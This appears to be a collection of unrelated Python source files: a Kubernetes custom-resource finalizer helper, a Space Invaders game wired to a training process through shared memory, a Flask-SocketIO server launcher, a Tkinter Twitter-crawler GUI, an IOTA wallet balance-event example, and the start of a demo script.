# Add finalize to list
finalizers.append(finalizer)
custom_res = {'metadata': {'finalizers': finalizers}}
# Update CR
try:
self.co_api.patch_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when adding finalizer to CR %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug('Added finalizer %s to CR %s', finalizer, name)
return True
else:
_LOGGER.error('Unable to add finalizer to CR %s. CR not found', name)
return False
def remove_finalizer(self, name: str, finalizer: str) -> bool:
"""Remove a finalizer from a CR."""
cls = self.__class__
if self.check_cr_exists(name):
# Get current finalizers
cr_resp = self.get_cr(name)
finalizers = cr_resp['metadata'].get('finalizers', [])
# Remove finalizer from list
try:
finalizers.remove(finalizer)
except ValueError:
_LOGGER.error(
'Unable to remove finalizer from CR %s. Finalizer %s not found', name,
finalizer)
return False
custom_res = {'metadata': {'finalizers': finalizers}}
# Update CR
try:
self.co_api.patch_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when removing finalizer from CR %s: %s', self.group,
self.plural, name, err)
raise
else:
_LOGGER.debug('Removed finalizer %s from CR %s', finalizer, name)
return True
else:
_LOGGER.error('Unable to remove finalizer from CR %s. CR not found', name)
return False
@staticmethod
def set_controller_reference(controlled_cr: Dict, owner_cr: Dict) -> Dict:
"""Set controller reference to custom resource."""
controller_reference = {
'apiVersion': owner_cr['apiVersion'],
'blockOwnerDeletion': True,
'controller': True,
'kind': owner_cr['kind'],
'name': owner_cr['metadata']['name'],
'uid': owner_cr['metadata']['uid']
}
refs = controlled_cr['metadata'].get('ownerReferences', [])
existing = False
for ref in refs:
if ref.get('controller') is True:
existing = True
if existing is False:
refs.append(controller_reference)
controlled_cr['metadata']['ownerReferences'] = refs
return controlled_cr
|
spaceinvaders.py
|
#!/usr/bin/env python
# Space Invaders
# Created by Lee Robinson
if __name__ == '__main__':
import sys
from os.path import abspath, dirname
from random import choice
import multiprocessing
from multiprocessing import shared_memory
import torch
import math as m
import time as t
from torchvision import transforms
import training
shm_screen = shared_memory.SharedMemory(create=True, size=1920000)
shm_stats = shared_memory.SharedMemory(create=True, size=17)
shm_controls = shared_memory.SharedMemory(create=True, size=3)
shm_player_input = shared_memory.SharedMemory(create=True, size=3)
shm_gameover = shared_memory.SharedMemory(create=True, size=1)
shm_screen_name = shm_screen.name
shm_stats_name = shm_stats.name
shm_controls_name = shm_controls.name
shm_player_input_name = shm_player_input.name
shm_gameover_name = shm_gameover.name
enemyBulletsList = []
def getKey(index):
return shm_controls.buf[index]
p = multiprocessing.Process(target=training.training_stuff, args=[shm_screen_name, shm_stats_name, shm_controls_name, shm_gameover_name, shm_player_input_name])
p.start()
import pygame
from pygame import *
BASE_PATH = abspath(dirname(__file__))
FONT_PATH = BASE_PATH + '/fonts/'
IMAGE_PATH = BASE_PATH + '/images/'
SOUND_PATH = BASE_PATH + '/sounds/'
# Colors (R, G, B)
WHITE = (255, 255, 255)
GREEN = (78, 255, 87)
YELLOW = (241, 255, 0)
BLUE = (80, 255, 239)
PURPLE = (203, 0, 255)
RED = (237, 28, 36)
SCREEN = display.set_mode((800, 600))
FONT = FONT_PATH + 'space_invaders.ttf'
IMG_NAMES = ['ship', 'mystery',
'enemy1_1', 'enemy1_2',
'enemy2_1', 'enemy2_2',
'enemy3_1', 'enemy3_2',
'explosionblue', 'explosiongreen', 'explosionpurple',
'laser', 'enemylaser']
IMAGES = {name: image.load(IMAGE_PATH + '{}.png'.format(name)).convert_alpha()
for name in IMG_NAMES}
BLOCKERS_POSITION = 450
ENEMY_DEFAULT_POSITION = 65 # Initial value for a new game
ENEMY_MOVE_DOWN = 35
class Ship(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = IMAGES['ship']
self.rect = self.image.get_rect(topleft=(375, 540))
self.speed = 5
def update(self, keys, *args):
if getKey(0) and self.rect.x > 10:
self.rect.x -= self.speed
if getKey(1) and self.rect.x < 740:
self.rect.x += self.speed
game.screen.blit(self.image, self.rect)
class Bullet(sprite.Sprite):
def __init__(self, xpos, ypos, direction, speed, filename, side):
sprite.Sprite.__init__(self)
self.image = IMAGES[filename]
self.rect = self.image.get_rect(topleft=(xpos, ypos))
self.speed = speed
self.direction = direction
self.side = side
self.filename = filename
def update(self, keys, *args):
game.screen.blit(self.image, self.rect)
self.rect.y += self.speed * self.direction
if self.rect.y < 15 or self.rect.y > 600:
self.kill()
class Enemy(sprite.Sprite):
def __init__(self, row, column):
sprite.Sprite.__init__(self)
self.row = row
self.column = column
self.images = []
self.load_images()
self.index = 0
self.image = self.images[self.index]
self.rect = self.image.get_rect()
def toggle_image(self):
self.index += 1
if self.index >= len(self.images):
self.index = 0
self.image = self.images[self.index]
def update(self, *args):
game.screen.blit(self.image, self.rect)
def load_images(self):
images = {0: ['1_2', '1_1'],
1: ['2_2', '2_1'],
2: ['2_2', '2_1'],
3: ['3_1', '3_2'],
4: ['3_1', '3_2'],
}
img1, img2 = (IMAGES['enemy{}'.format(img_num)] for img_num in
images[self.row])
self.images.append(transform.scale(img1, (40, 35)))
self.images.append(transform.scale(img2, (40, 35)))
class EnemiesGroup(sprite.Group):
def __init__(self, columns, rows):
sprite.Group.__init__(self)
self.enemies = [[None] * columns for _ in range(rows)]
self.columns = columns
self.rows = rows
self.leftAddMove = 0
self.rightAddMove = 0
self.moveTime = 600
self.direction = 1
self.rightMoves = 30
self.leftMoves = 30
self.moveNumber = 15
self.timer = time.get_ticks()
self.bottom = game.enemyPosition + ((rows - 1) * 45) + 35
self._aliveColumns = list(range(columns))
self._leftAliveColumn = 0
self._rightAliveColumn = columns - 1
def update(self, current_time):
if current_time - self.timer > self.moveTime:
if self.direction == 1:
max_move = self.rightMoves + self.rightAddMove
else:
max_move = self.leftMoves + self.leftAddMove
if self.moveNumber >= max_move:
self.leftMoves = 30 + self.rightAddMove
self.rightMoves = 30 + self.leftAddMove
self.direction *= -1
self.moveNumber = 0
self.bottom = 0
for enemy in self:
#enemy.rect.y += ENEMY_MOVE_DOWN
enemy.toggle_image()
if self.bottom < enemy.rect.y + 35:
self.bottom = enemy.rect.y + 35
else:
velocity = 10 if self.direction == 1 else -10
for enemy in self:
#enemy.rect.x += velocity
enemy.toggle_image()
self.moveNumber += 1
self.timer += self.moveTime
def add_internal(self, *sprites):
super(EnemiesGroup, self).add_internal(*sprites)
for s in sprites:
self.enemies[s.row][s.column] = s
def remove_internal(self, *sprites):
super(EnemiesGroup, self).remove_internal(*sprites)
for s in sprites:
self.kill(s)
self.update_speed()
def is_column_dead(self, column):
return not any(self.enemies[row][column]
for row in range(self.rows))
def random_bottom(self):
col = choice(self._aliveColumns)
col_enemies = (self.enemies[row - 1][col]
for row in range(self.rows, 0, -1))
return next((en for en in col_enemies if en is not None), None)
def update_speed(self):
if len(self) == 1:
self.moveTime = 200
elif len(self) <= 10:
self.moveTime = 400
def kill(self, enemy):
self.enemies[enemy.row][enemy.column] = None
is_column_dead = self.is_column_dead(enemy.column)
if is_column_dead:
self._aliveColumns.remove(enemy.column)
if enemy.column == self._rightAliveColumn:
while self._rightAliveColumn > 0 and is_column_dead:
self._rightAliveColumn -= 1
self.rightAddMove += 5
is_column_dead = self.is_column_dead(self._rightAliveColumn)
elif enemy.column == self._leftAliveColumn:
while self._leftAliveColumn < self.columns and is_column_dead:
self._leftAliveColumn += 1
self.leftAddMove += 5
is_column_dead = self.is_column_dead(self._leftAliveColumn)
class Blocker(sprite.Sprite):
def __init__(self, size, color, row, column):
sprite.Sprite.__init__(self)
self.height = size
self.width = size
self.color = color
self.image = Surface((self.width, self.height))
self.image.fill(self.color)
self.rect = self.image.get_rect()
self.row = row
self.column = column
def update(self, keys, *args):
game.screen.blit(self.image, self.rect)
class Mystery(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = IMAGES['mystery']
self.image = transform.scale(self.image, (75, 35))
self.rect = self.image.get_rect(topleft=(-80, 45))
self.row = 5
self.moveTime = 25000
self.direction = 1
self.timer = time.get_ticks()
self.mysteryEntered = mixer.Sound(SOUND_PATH + 'mysteryentered.wav')
self.mysteryEntered.set_volume(0.3)
self.playSound = True
def update(self, keys, currentTime, *args):
resetTimer = False
passed = currentTime - self.timer
if passed > self.moveTime:
if (self.rect.x < 0 or self.rect.x > 800) and self.playSound:
#self.mysteryEntered.play()
self.playSound = False
if self.rect.x < 840 and self.direction == 1:
self.mysteryEntered.fadeout(4000)
self.rect.x += 2
game.screen.blit(self.image, self.rect)
if self.rect.x > -100 and self.direction == -1:
self.mysteryEntered.fadeout(4000)
self.rect.x -= 2
game.screen.blit(self.image, self.rect)
if self.rect.x > 830:
self.playSound = True
self.direction = -1
resetTimer = True
if self.rect.x < -90:
self.playSound = True
self.direction = 1
resetTimer = True
if passed > self.moveTime and resetTimer:
self.timer = currentTime
class EnemyExplosion(sprite.Sprite):
def __init__(self, enemy, *groups):
super(EnemyExplosion, self).__init__(*groups)
self.image = transform.scale(self.get_image(enemy.row), (40, 35))
self.image2 = transform.scale(self.get_image(enemy.row), (50, 45))
self.rect = self.image.get_rect(topleft=(enemy.rect.x, enemy.rect.y))
self.timer = time.get_ticks()
@staticmethod
def get_image(row):
img_colors = ['purple', 'blue', 'blue', 'green', 'green']
return IMAGES['explosion{}'.format(img_colors[row])]
def update(self, current_time, *args):
passed = current_time - self.timer
if passed <= 100:
game.screen.blit(self.image, self.rect)
elif passed <= 200:
game.screen.blit(self.image2, (self.rect.x - 6, self.rect.y - 6))
elif 400 < passed:
self.kill()
class MysteryExplosion(sprite.Sprite):
def __init__(self, mystery, score, *groups):
super(MysteryExplosion, self).__init__(*groups)
self.text = Text(FONT, 20, str(score), WHITE,
mystery.rect.x + 20, mystery.rect.y + 6)
self.timer = time.get_ticks()
def update(self, current_time, *args):
passed = current_time - self.timer
if passed <= 200 or 400 < passed <= 600:
self.text.draw(game.screen)
elif 600 < passed:
self.kill()
class ShipExplosion(sprite.Sprite):
def __init__(self, ship, *groups):
super(ShipExplosion, self).__init__(*groups)
self.image = IMAGES['ship']
self.rect = self.image.get_rect(topleft=(ship.rect.x, ship.rect.y))
self.timer = time.get_ticks()
def update(self, current_time, *args):
passed = current_time - self.timer
if 300 < passed <= 600:
game.screen.blit(self.image, self.rect)
elif 900 < passed:
self.kill()
class Life(sprite.Sprite):
def __init__(self, xpos, ypos):
sprite.Sprite.__init__(self)
self.image = IMAGES['ship']
self.image = transform.scale(self.image, (23, 23))
self.rect = self.image.get_rect(topleft=(xpos, ypos))
def update(self, *args):
game.screen.blit(self.image, self.rect)
class Text(object):
def __init__(self, textFont, size, message, color, xpos, ypos):
self.font = font.Font(textFont, size)
self.surface = self.font.render(message, True, color)
self.rect = self.surface.get_rect(topleft=(xpos, ypos))
def draw(self, surface):
surface.blit(self.surface, self.rect)
class SpaceInvaders(object):
def __init__(self):
# It seems, in Linux buffersize=512 is not enough, use 4096 to prevent:
# ALSA lib pcm.c:7963:(snd_pcm_recover) underrun occurred
mixer.pre_init(44100, -16, 1, 4096)
init()
self.clock = time.Clock()
self.caption = display.set_caption('Space Invaders')
self.screen = SCREEN
self.background = image.load(IMAGE_PATH + 'background.jpg').convert()
self.startGame = False
self.mainScreen = True
self.gameOver = False
# Counter for enemy starting position (increased each new round)
self.enemyPosition = ENEMY_DEFAULT_POSITION
self.titleText = Text(FONT, 50, 'Space Invaders', WHITE, 164, 155)
self.titleText2 = Text(FONT, 25, 'Press any key to continue', WHITE,
201, 225)
self.gameOverText = Text(FONT, 50, 'Game Over', WHITE, 250, 270)
self.nextRoundText = Text(FONT, 50, 'Next Round', WHITE, 240, 270)
self.enemy1Text = Text(FONT, 25, ' = 10 pts', GREEN, 368, 270)
self.enemy2Text = Text(FONT, 25, ' = 20 pts', BLUE, 368, 320)
self.enemy3Text = Text(FONT, 25, ' = 30 pts', PURPLE, 368, 370)
self.enemy4Text = Text(FONT, 25, ' = ?????', RED, 368, 420)
self.scoreText = Text(FONT, 20, 'Score', WHITE, 5, 5)
self.livesText = Text(FONT, 20, 'Lives ', WHITE, 640, 5)
self.life1 = Life(715, 3)
self.life2 = Life(742, 3)
self.life3 = Life(769, 3)
self.livesGroup = sprite.Group()#self.life1, self.life2, self.life3)
self.score = 0
def reset(self, score):
self.player = Ship()
self.playerGroup = sprite.Group(self.player)
self.explosionsGroup = sprite.Group()
self.bullets = sprite.Group()
self.mysteryShip = Mystery()
self.mysteryGroup = sprite.Group(self.mysteryShip)
self.enemyBullets = sprite.Group()
self.make_enemies()
self.allSprites = sprite.Group(self.player, self.enemies,
self.livesGroup, self.mysteryShip)
self.keys = key.get_pressed()
self.timer = time.get_ticks()
self.noteTimer = time.get_ticks()
self.shipTimer = time.get_ticks()
self.score = score
self.create_audio()
self.makeNewShip = False
self.shipAlive = True
def make_blockers(self, number):
blockerGroup = sprite.Group()
# for row in range(4):
# for column in range(9):
# blocker = Blocker(10, GREEN, row, column)
# blocker.rect.x = 50 + (200 * number) + (column * blocker.width)
# blocker.rect.y = BLOCKERS_POSITION + (row * blocker.height)
# blockerGroup.add(blocker)
return blockerGroup
def create_audio(self):
self.sounds = {}
for sound_name in ['shoot', 'shoot2', 'invaderkilled', 'mysterykilled',
'shipexplosion']:
self.sounds[sound_name] = mixer.Sound(
SOUND_PATH + '{}.wav'.format(sound_name))
self.sounds[sound_name].set_volume(0.2)
self.musicNotes = [mixer.Sound(SOUND_PATH + '{}.wav'.format(i)) for i
in range(4)]
for sound in self.musicNotes:
sound.set_volume(0.5)
self.noteIndex = 0
def play_main_music(self, currentTime):
if currentTime - self.noteTimer > self.enemies.moveTime:
self.note = self.musicNotes[self.noteIndex]
if self.noteIndex < 3:
self.noteIndex += 1
else:
self.noteIndex = 0
#self.note.play()
self.noteTimer += self.enemies.moveTime
@staticmethod
def should_exit(evt):
# type: (pygame.event.EventType) -> bool
return evt.type == QUIT or (evt.type == KEYUP and evt.key == K_ESCAPE)
def check_input(self):
self.keys = key.get_pressed()
if getKey(2) and False:
if len(self.bullets) == 0 and self.shipAlive:
if self.score < 1000:
bullet = Bullet(self.player.rect.x + 23,
self.player.rect.y + 5, -1,
15, 'laser', 'center')
self.bullets.add(bullet)
self.allSprites.add(self.bullets)
#self.sounds['shoot'].play()
else:
leftbullet = Bullet(self.player.rect.x + 8,
self.player.rect.y + 5, -1,
15, 'laser', 'left')
rightbullet = Bullet(self.player.rect.x + 38,
self.player.rect.y + 5, -1,
15, 'laser', 'right')
self.bullets.add(leftbullet)
self.bullets.add(rightbullet)
self.allSprites.add(self.bullets)
#self.sounds['shoot2'].play()
def make_enemies(self):
#enemies = EnemiesGroup(10, 5)
enemies = EnemiesGroup(16, 5)
for row in range(5):
for column in range(0, 16):
enemy = Enemy(row, column)
#enemy.rect.x = 157 + (column * 50)
enemy.rect.x = 7 + (column * 50)
enemy.rect.y = self.enemyPosition + (row * 45)
enemies.add(enemy)
self.enemies = enemies
def make_enemies_shoot(self):
if (time.get_ticks() - self.timer) > 200 and self.enemies:
#if (time.get_ticks() - self.timer) > 200 and self.enemies:
enemy = self.enemies.random_bottom()
# while not enemy.column == 0 and not enemy.column == 7 and not enemy.column == 15:
# enemy = self.enemies.random_bottom()
b = Bullet(enemy.rect.x + 14, enemy.rect.y + 20, 1, 5, 'enemylaser', 'center')
enemyBulletsList.append(b)
self.enemyBullets.add(b)
self.allSprites.add(self.enemyBullets)
self.timer = time.get_ticks()
def calculate_score(self, row):
scores = {0: 30,
1: 20,
2: 20,
3: 10,
4: 10,
5: choice([50, 100, 150, 300])
}
score = scores[row]
self.score += score
return score
def create_main_menu(self):
self.enemy1 = IMAGES['enemy3_1']
self.enemy1 = transform.scale(self.enemy1, (40, 40))
self.enemy2 = IMAGES['enemy2_2']
self.enemy2 = transform.scale(self.enemy2, (40, 40))
self.enemy3 = IMAGES['enemy1_2']
self.enemy3 = transform.scale(self.enemy3, (40, 40))
self.enemy4 = IMAGES['mystery']
self.enemy4 = transform.scale(self.enemy4, (80, 40))
self.screen.blit(self.enemy1, (318, 270))
self.screen.blit(self.enemy2, (318, 320))
self.screen.blit(self.enemy3, (318, 370))
self.screen.blit(self.enemy4, (299, 420))
def check_collisions(self):
sprite.groupcollide(self.bullets, self.enemyBullets, True, True)
for enemy in sprite.groupcollide(self.enemies, self.bullets,
True, True).keys():
#self.sounds['invaderkilled'].play()
self.calculate_score(enemy.row)
EnemyExplosion(enemy, self.explosionsGroup)
self.gameTimer = time.get_ticks()
for mystery in sprite.groupcollide(self.mysteryGroup, self.bullets,
True, True).keys():
mystery.mysteryEntered.stop()
#self.sounds['mysterykilled'].play()
score = self.calculate_score(mystery.row)
MysteryExplosion(mystery, score, self.explosionsGroup)
newShip = Mystery()
self.allSprites.add(newShip)
self.mysteryGroup.add(newShip)
for player in sprite.groupcollide(self.playerGroup, self.enemyBullets,
True, True).keys():
if self.life3.alive():
self.life3.kill()
elif self.life2.alive():
self.life2.kill()
elif self.life1.alive():
self.life1.kill()
else:
self.gameOver = True
self.startGame = False
#self.sounds['shipexplosion'].play()
ShipExplosion(player, self.explosionsGroup)
self.makeNewShip = True
self.shipTimer = time.get_ticks()
self.shipAlive = False
if self.enemies.bottom >= 540:
sprite.groupcollide(self.enemies, self.playerGroup, True, True)
if not self.player.alive() or self.enemies.bottom >= 600:
self.gameOver = True
self.startGame = False
sprite.groupcollide(self.bullets, self.allBlockers, True, True)
sprite.groupcollide(self.enemyBullets, self.allBlockers, True, True)
if self.enemies.bottom >= BLOCKERS_POSITION:
sprite.groupcollide(self.enemies, self.allBlockers, False, True)
def create_new_ship(self, createShip, currentTime):
if createShip and (currentTime - self.shipTimer > 900):
self.player = Ship()
self.allSprites.add(self.player)
self.playerGroup.add(self.player)
self.makeNewShip = False
self.shipAlive = True
def create_game_over(self, currentTime):
self.screen.blit(self.background, (0, 0))
passed = currentTime - self.timer
# if passed < 750:
# self.gameOverText.draw(self.screen)
# elif 750 < passed < 1500:
# self.screen.blit(self.background, (0, 0))
# elif 1500 < passed < 2250:
# self.gameOverText.draw(self.screen)
# elif 2250 < passed < 2750:
# self.screen.blit(self.background, (0, 0))
# elif passed > 3000:
shm_gameover.buf[0] = 1
self.update_buffers(1)
while shm_gameover.buf[0] == 1:
t.sleep(0.001)
self.mainScreen = True
t.sleep(3)
for e in event.get():
if self.should_exit(e):
sys.exit()
def update_buffers(self, dead):
buffer = self.screen.get_buffer()
shm_screen.buf[:] = buffer.raw
del buffer
shm_stats.buf[0] = self.score % 256
shm_stats.buf[1] = m.floor(self.score/256) % 256
shm_stats.buf[2] = m.floor(self.score/(256*256)) % 256
shm_stats.buf[3] = len(self.livesGroup) - dead + 1
shm_stats.buf[4] = int(float(self.player.rect.x-10)/730.0*255)
if len(enemyBulletsList) > 0:
b = enemyBulletsList[0]
if not self.enemyBullets.has(b):
enemyBulletsList.remove(b)
for i in range(6):
if len(enemyBulletsList) > i:
b = enemyBulletsList[i]
shm_stats.buf[5+2*i] = int(b.rect.left/4)
shm_stats.buf[6+2*i] = int(b.rect.top/3)
else:
shm_stats.buf[5+2*i] = 0
shm_stats.buf[6+2*i] = 0
#print(len(enemyBulletsList))
#print(len(enemyBulletsList))
# for e in event.get():
# if self.should_exit(e):
# sys.exit()
if self.keys[K_LEFT]:
shm_player_input.buf[0] = 1
else:
shm_player_input.buf[0] = 0
if self.keys[K_RIGHT]:
shm_player_input.buf[1] = 1
else:
shm_player_input.buf[1] = 0
# if e.type == KEYDOWN and e.key == K_SPACE:
# shm_player_input[2] = 1
# elif e.key == K_SPACE:
# shm_player_input[2] = 0
def main(self):
t.sleep(1)
while True:
if self.mainScreen:
self.screen.blit(self.background, (0, 0))
self.titleText.draw(self.screen)
self.titleText2.draw(self.screen)
self.enemy1Text.draw(self.screen)
self.enemy2Text.draw(self.screen)
self.enemy3Text.draw(self.screen)
self.enemy4Text.draw(self.screen)
self.create_main_menu()
# for e in event.get():
# if self.should_exit(e):
# sys.exit()
# if e.type == KEYUP:
# Only create blockers on a new game, not a new round
self.allBlockers = sprite.Group(self.make_blockers(0),
self.make_blockers(1),
self.make_blockers(2),
self.make_blockers(3))
#self.livesGroup.add(self.life1, self.life2, self.life3)
self.reset(0)
self.startGame = True
self.mainScreen = False
elif self.startGame:
if not self.enemies and not self.explosionsGroup:
currentTime = time.get_ticks()
if currentTime - self.gameTimer < 3000:
self.screen.blit(self.background, (0, 0))
self.scoreText2 = Text(FONT, 20, str(self.score),
GREEN, 85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.nextRoundText.draw(self.screen)
self.livesText.draw(self.screen)
self.livesGroup.update()
self.check_input()
if currentTime - self.gameTimer > 3000:
# Move enemies closer to bottom
self.enemyPosition += ENEMY_MOVE_DOWN
self.reset(self.score)
self.gameTimer += 3000
else:
currentTime = time.get_ticks()
self.play_main_music(currentTime)
self.screen.blit(self.background, (0, 0))
self.allBlockers.update(self.screen)
self.scoreText2 = Text(FONT, 20, str(self.score), GREEN,
85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.livesText.draw(self.screen)
self.check_input()
self.enemies.update(currentTime)
self.allSprites.update(self.keys, currentTime)
self.explosionsGroup.update(currentTime)
self.check_collisions()
self.create_new_ship(self.makeNewShip, currentTime)
self.make_enemies_shoot()
elif self.gameOver:
currentTime = time.get_ticks()
# Reset enemy starting position
self.enemyPosition = ENEMY_DEFAULT_POSITION
self.create_game_over(currentTime)
self.score += 1
display.update()
self.update_buffers(0)
while shm_gameover.buf[0] == 1:
t.sleep(1)
for event in pygame.event.get():
if event.type == QUIT:
break
self.clock.tick(60)
game = SpaceInvaders()
game.main()
|
__main__.py
|
import os
import ssl
from multiprocessing import Process
from flask import Flask
from openmfd.server import create_app, socketio
from openmfd.ssl.generate import generate_instance_ssl
app = create_app()
def main():
has_certificate = os.path.isfile(app.instance_path + "/cert.pem")
if not has_certificate:
generate_instance_ssl(app.instance_path)
run_server(app)
# process = Process(target=run_server, args=(app,))
# process.start()
def run_server(app: Flask):
keyfile = app.instance_path + "/key.pem"
certfile = app.instance_path + "/cert.pem"
# ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# ctx.load_cert_chain(
# certfile,
# keyfile,
# )
socketio.run(
app,
debug=True,
use_reloader=False,
host='0.0.0.0',
port=6789,
ssl_version=ssl.PROTOCOL_TLSv1_2,
keyfile=keyfile,
certfile=certfile,
)
main()
|
guiCrawling.py
|
import Tkinter as tk
from versionControl import greeting
import AppKit
import subprocess
import threading
import time
import twitter_stream_download
import readJson
import os
start_bt_ms = "Welcome! Think about the keyword you want to know."
class App(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
self.pack()
self.master.title("")
self.master.resizable(False, False)
self.master.tk_setPalette(background='#ececec')
self.master.protocol('WM_DELETE_WINDOW', self.click_cancel)
self.master.bind('<Return>', self.click_ok)
self.master.bind('<Escape>', self.click_cancel)
x = (self.master.winfo_screenwidth() - self.master.winfo_reqwidth()) / 2
y = (self.master.winfo_screenheight() - self.master.winfo_reqheight()) / 3
self.master.geometry("+{}+{}".format(x, y))
self.master.config(menu=tk.Menu(self))
tk.Message(self, text= greeting(),
font='System 18 bold', justify='left', aspect=800).pack(pady=(5, 0))
tk.Message(self, text= "Step 1. Crawling",
font='System 14 bold', justify='left', aspect=800).pack(pady=(5, 0))
## frame 1
f1 = tk.Frame(self)
f1.pack(padx=60, pady=15, anchor='w')
self.f1l1 = tk.Label(f1, text='The tag or keyword you wish to grab from Twitter:')
self.f1l1.grid(row=0,column=0,columnspan=2,sticky='w')
self.f1l1L = tk.Label(f1, text='Keyword:')
self.f1l1L.grid(row=1, column=0, sticky='w')
self.user_input = tk.Entry(f1, background='white', width=30)
self.user_input.grid(row=1, column=1, sticky='w')
tk.Label(f1, text=' ').grid(row=2, column=0, sticky='w')
self.f1l2 = tk.Label(f1, text='The folder you wish to store data (default as ./output):')
self.f1l2.grid(row=3,column=0,columnspan=2,sticky='w')
self.f1l2L = tk.Label(f1, text='Path:')
self.f1l2L.grid(row=4, column=0, sticky='w')
self.pass_input = tk.Entry(f1, background='white', width=30)
self.pass_input.insert(0,"./output")
self.pass_input.grid(row=4, column=1, sticky='w')
##frame middle 1.5
f1_5 = tk.Frame(self)
f1_5.pack(padx=60, pady=(5,10), anchor='w')
self.ctl_tx = tk.Label(f1_5, anchor="w",fg='black',state='disabled',
text="Control crawling by following buttons after started:",width=45)
self.ctl_tx.pack()
self.ctl_1 = tk.Button(f1_5, text='Stop', height=1, width=6, state='disabled', command=self.click_1)
self.ctl_1.bind('<Enter>', self.hover_1)
self.ctl_1.bind('<Leave>', self.hover_off)
self.ctl_1.pack(side='right')
self.ctl_2 = tk.Button(f1_5, text='Fetch', height=1, width=6, state='disabled', command=self.click_2)
self.ctl_2.bind('<Enter>', self.hover_2)
self.ctl_2.bind('<Leave>', self.hover_off)
self.ctl_2.pack(side='right')
self.ctl_3 = tk.Button(f1_5, text='Check', height=1, width=6, state='disabled', command=self.click_3)
self.ctl_3.bind('<Enter>', self.hover_3)
self.ctl_3.bind('<Leave>', self.hover_off)
self.ctl_3.pack(side='right')
##frame 2
f2 = tk.Frame(self)
f2.pack(padx=60, pady=(10,10), anchor='w')
self.label = tk.Label(f2, anchor="w",fg="white",bg="blue", text=start_bt_ms, width=45)
self.label.pack()
tk.Label(f2, anchor="w",text=" ", width=45).pack()
## frame last
fb = tk.Frame(self)
fb.pack(padx=60, pady=(0, 15), anchor='e')
self.stb = tk.Button(fb, text='Start !', height=1, width=6, default='active', command=self.click_ok)
self.stb.pack(side='right')
self.stb.bind("<Enter>", self.hover_on)
self.stb.bind("<Leave>", self.hover_off)
self.stb2 = tk.Button(fb, text='Quit...', height=1, width=6, command=self.click_cancel)
self.stb2.pack(side='right', padx=10)
def hover_1(self, event=None):
self.label.config(text="Fetch contents, stop current crawling process and quit")
def hover_2(self, event=None):
self.label.config(text="Fetch meaningful contents of tweets for training in next step")
def hover_3(self, event=None):
self.label.config(text="Check number of tweets have been crawled")
def hover_on(self, event=None):
self.label.config(text="Click to start crawling")
def hover_off(self, event=None):
self.label.config(text=start_bt_ms)
def click_ok(self, event=None):
print "keyword: " + self.user_input.get()
print "folder: " + self.pass_input.get()
self.file_name = self.pass_input.get() + "/stream_" + self.user_input.get() + ".json"
print self.file_name
self.label.config(text="Crawling has started!")
global start_bt_ms
start_bt_ms = "Crawling has started!"
self.stb.config(state='disabled')
self.stb2.config(state='disabled')
self.ctl_1.config(state='active')
self.ctl_2.config(state='active')
self.ctl_3.config(state='active')
self.ctl_tx.config(state='normal')
self.user_input.config(state='disabled')
self.pass_input.config(state='disabled')
self.f1l1.config(state='disabled')
self.f1l1L.config(state='disabled')
self.f1l2.config(state='disabled')
self.f1l2L.config(state='disabled')
if not os.path.exists(self.pass_input.get()):
os.makedirs(self.pass_input.get())
newthread = threading.Thread(target=self.threadCrawl)
newthread.daemon = True
newthread.start()
def threadCrawl(self, event=None):
print "thread!"
twitter_stream_download.main(self.user_input.get(), self.pass_input.get())
def click_cancel(self, event=None):
print("The user clicked 'Cancel'")
self.master.destroy()
def click_1(self, event=None):
print "Stop"
readJson.main(self.file_name)
self.master.destroy()
def click_2(self, event=None):
lines = readJson.main(self.file_name)
tmp = "Fetch: " + str(lines) + " lines of contents are fetched"
self.label.config(text=tmp)
print "Fetch"
def click_3(self, event=None):
if os.path.isfile(self.file_name):
lines = sum(1 for line in open(self.file_name))
else:
lines = 0
tmp = "Check: " + str(lines) + " tweets have been crawled"
self.label.config(text=tmp)
global start_bt_ms
start_bt_ms = tmp
print "Check"
def crawling():
info = AppKit.NSBundle.mainBundle().infoDictionary()
info['LSUIElement'] = True
fixbug = "/Users/wuwenzhen/python/tweets/developSoftware/dustbin/py2app/venv/lib/python2.7/site-packages/pip/_vendor/requests/cacert.pem"
if os.path.isfile(fixbug):
os.environ['REQUESTS_CA_BUNDLE'] = fixbug
root = tk.Tk()
app = App(root)
AppKit.NSApplication.sharedApplication().activateIgnoringOtherApps_(True)
app.mainloop()
|
7_event.py
|
# Copyright 2020 IOTA Stiftung
# SPDX-License-Identifier: Apache-2.0
import iota_wallet
import threading
import queue
import time
# This example shows how to listen to on_balance_change event.
# The queue to store received events
q = queue.Queue()
def worker():
"""The worker to process the queued events.
"""
while True:
item = q.get(True)
print(f'Get event: {item}')
q.task_done()
def balance_changed_event_processing(event):
"""Processing function when event is received.
"""
print(f'On balanced changed: {event}')
q.put(event)
# Get the acount manager
manager = iota_wallet.AccountManager(
storage='Stronghold', storage_path='./alice-database')
manager.set_stronghold_password("password")
# Get the account
account = manager.get_account('Alice')
print(f'Account: {account.alias()}')
# Always sync before doing anything with the account
print('Syncing...')
synced = account.sync().execute()
# Get the latest unused address
last_address_obj = account.latest_address()
print(f"Address: {last_address_obj['address']}")
# turn-on the worker thread
threading.Thread(target=worker, daemon=True).start()
# listen to the on_balance_change event
iota_wallet.on_balance_change(balance_changed_event_processing)
# Use the Chrysalis Faucet to send testnet tokens to your address:
print(
f"Fill your Address ({last_address_obj['address']['inner']}) with the Faucet: https://faucet.testnet.chrysalis2.com/")
print("To see how the on_balance_change is called, please send tokens to the address in 1 min")
time.sleep(60)
# block until all tasks are done
q.join()
print('All work completed')
|
demo_parallel.py
|
from __future__ import division
from __future__ import print_function
import sys
import os
sys.path.append( '%s/gcn' % os.path.dirname(os.path.realpath(__file__)) )
# add the libary path for graph reduction and local search
